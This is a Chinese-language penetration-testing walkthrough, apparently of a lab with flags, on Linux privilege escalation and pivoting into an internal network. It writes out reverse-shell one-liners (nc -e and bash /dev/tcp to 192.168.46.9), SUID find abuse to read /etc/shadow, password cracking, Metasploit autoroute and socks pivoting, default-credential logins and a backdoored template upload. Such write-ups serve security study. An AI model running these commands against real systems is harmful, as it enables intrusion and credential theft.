00x7-linux三大提权工具使用
信息搜集
LinEnum.sh
主要是检查Linux的系统信息的脚本文件
linux-exploit-suggester.sh文件
检查Linux系统上是否存在指纹漏洞的
liinuxprivchecker.py
功能和第一个一样都是检查系统信息、这个主要是检查系统的内核文件
文件上传
对于文件上传的方式我们一般有两种
1.使用webshell工具(菜刀、蚁剑)的自带上传服务上传文件
2.使用Python自带的web服务来上传
使用菜刀
使用Python的http服务
下载
执行命令
sh LinEnum.sh > lin.txt
获取的所有信息都会在终端显示出来
运行第二个检测脚本
发现可利用的点
运行第三个
python linuxprivchecker.py
基本的信息我们都已经查看完了、
可以确实能够确定的就是目标机里面还存这内网的环境在里面、是有两块网卡的、还有一些基本的信息
然后我们看到目标机的passwd文件、可以看到用户的信息
arp表中发现内网网站
查看目标机的SUID表
查看那些命令是能够执行root权限的
我们也可以使用其他的命令来查看
find / -type f -perm -u=s 2>/dev/null
这里我们看到find命令是有s权限的、也就是能够想root一样执行命令的
suid提权
参考文献
测试
首先是建立一个空的文件夹
touch test
然后测试执行命令
find test -exec whoami \;
结果
可以执行root命令
反弹shell
find test -exec netcat -lvvp 192.168.46.9 5555 -e /bin/sh \;
find test -exec nc -lvvp 5555 -e /bin/sh \;
find test2 -exec bash -i >& /dev/tcp/192.168.46.9/5555 0>&1 \;
查看shadow密码
find test -exec cat /etc/shadow \;
结果
找到一个密码
使用john进行密码破解
将密码导出来
find test -exec cat /etc/shadow > 1.txt \;
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > passwords.txt
破解
结果
sudo提权
在前面我们已经得到用户的shadow密码文件、可以得到密码
切换用户
看一下主目录文件
cd ~
ls -la
查看文件
切换root用户
sudo su root
结果
两种方法都是能够得到root权限的
00x8-宝塔提权
我们在菜刀链接上以后看到目录文件的特征就知道这是一个宝塔面板搭建的网站、而且在网站的端口是有8888
开启的、我们访问打开发现是宝塔的安全界面的。
在菜刀上查看shell的权限
发现整个权限是很大的
我们能够访问到整个网站所有的文件的内容的
在目录文件中我们看到有bt.txt的文件;下载打开
宝塔的安全面板命令以及用户名密码
直接登录成功
查看宝塔的用户权限
我们在文件里是可以访问任何文件的同时是可以编辑的
我们来到计划任务、是可以直接添加任务、写入文件的
写一个反弹shell
执行
监听端口、直接就能收到
直接就是root的权限
00x9-metasploit开启代理穿透内网
使用matesploit开启代理打进内网
我们使用msf反弹的shell是www权限的、这时我们需要使用root权限的
这里我们已经有上次的root权限了
现在需要的是给msf弹一个root权限的shell
步骤
在原来的msf上重新执行攻击载荷
另外开启的窗口监听的信息
成功拿到root权限的shell
添加代理
首先查看网卡信息
在查看一下路由表信息
是有访问过10.10.10.144的
确定内网的目标机
查看hosts文件
先确定内网网站信息
存在
使用matasploit做一个代理、让我们的攻击机能够访问到10端
步骤
使用msf获取路由信息
run get_local_subnets
结果
添加路由表
run autoroute -s 10.10.10.0/24
检查的话可以使用
run autoroute -p
结果
启动一个sock4模块
search socks
use auxiliary/server/socks_proxy
启用
设置代理端口
set SRVPORT 5555
这里需要注意的就是我们在配置代理信息的时候模式是使用的socks5的通道协议的、下面的VERSION选项我们是可以自己进行选择的、可以选择socks5或者是socks4a、这里一点是与msf5不一样的、在msf5里面是直接选择使用socksa的模块的
然后启动
添加本地的代理
安装proxy
apt install proxy
添加配置信息
sudo vim /etc/proxychains4.conf
结果
扫描目标机的内网
sudo proxychains4 nmap -sT -Pn 10.10.10.144
结果是可以访问的
添加本地的housts域名绑定、然后访问、也是没有问题的
成功访问到目标机的内网段
0x010-通过代理攻击内网靶机
内网探测
我们在做完代理后、能够顺利的访问到内网段的主机、就可以开始内网的信息扫描搜集
sudo proxychains4 nmap -sT -Pn -A 10.10.10.144
结果
对于内网的网站环境一般来说、安全防护一般都是会比较弱的、安全人员自认为是在内网段中、对于一些账号密码的设置甚至都是弱口令的形式。
这个我们可以尝试使用弱口令进行爆破、我们还可以尝试一些简单的弱口令
结果登录成功
直接进入网站的后台
漏洞挖掘
我们在登录之后、发现是有编辑器的
是可以自己写内容的、不知道是保存html还是php格式、我们可以先进行尝试
结果发现是不能直接访问的、是在数据库里进行调取的
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZzxMDEoZ-1643531785211)(https://gitee.com/jokerjq/like4h-blog-img/raw/master/images/202201292251181.png)]
发现网站模板编辑
查看是什么模板
进行网站的指纹识别
发现是emlog模板
最多的就是sql注入与后台的文件上传
复现
后台的管理员我们已经拿到了、现在直接使用后文件上传、上传木马文件即可
步骤
我们下载一个模板文件、然后再模板文件里面添加后门shell小马、将其压缩打包上传到后台、在执行模板(目标机会自动的将打包文件进行解压、然后将shell木马解压到服务器目录当中)
准备模板文件
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VyrrKkeD-1643531785213)(https://gitee.com/jokerjq/like4h-blog-img/raw/master/images/202201292251913.png)]
下载链接
添加木马文件
上传
访问
先查看一下网站源码目录文件
访问目录
可以没有问题
链接蚁剑、冰蝎
双双拿下
00x11-wdcp主机系统提权
前面我们已经链接上自己的shell
但是权限还是www
下面还需要进行提权
我们首先确定一下网站的搭建是否是用的工具搭建的
访问一个主机的ip地址、查看80端口
可以发现是一个wdcp的管理系统
查看一下暴露出来的内容信息
尝试登录后台管理员
查看php探针信息
对于wdcp管理系统不熟悉的可以google搜索相关的提权漏洞
这里我们访问默认的phpmyadmin的目录
密码的话就尝试默认密码
root/admin
wdlinux.cn
登录成功
发现是有两个可疑数据库的一个就是wdcp管理系统的数据库信息、一个是网站管理的数据库信息
这里我们需要的是wdcp管理系统的用户信息、查看相应的数据表
查看用户密码、发现是MD5的加密
对于密码我们一般就是两种方法、解密、替换两种方法
先进行解密
发现是能够查的说明是完成的MD5、没有加盐
直接替换
审计源码、查找config数据库链接配置文件
nice
直接链接
远程不行、那就直接代理链接
好像也是不行、应该是权限不够
那就破解密码传送门
密码
moonsec123
登录
点击提交后立马弹窗登录超时、一般这种情况应该是目标机的时间不是北京时间、所导致的问题
查询时间
时间是不对的
查看时区
date -R
东八区是没有错的
既然目标机的时间我们没有办法更改那么久更改我们自己的时间就行了
再次登录
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VyW5Hh5A-1643531785220)(https://gitee.com/jokerjq/like4h-blog-img/raw/master/images/202201292253467.png)]
进入后台就好办了
直接查看管理系统有什么权限、以及是否有执行命令的窗口
root权限
这里我们需要注意一点这个执行命令的窗口是有限制的,不是什么命令都可以执行的
在下面的安全管理中我们可以看到网站是禁用ping的一旦使用ping命令就会造成陷入缓冲、直接被禁了、
需要清楚cookie后才能继续访问网站
反弹shell
执行
bash
继续查看下面的模块
ssh管理模块
下载ssh秘钥
链接
成功拿到root的shell
0x012-三个flag
122-flag1
122-flag2
内网flag3
写在最后
欢迎大家加入星球一起学习、里面有各种红队资源、工具、各种小技巧啊!
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
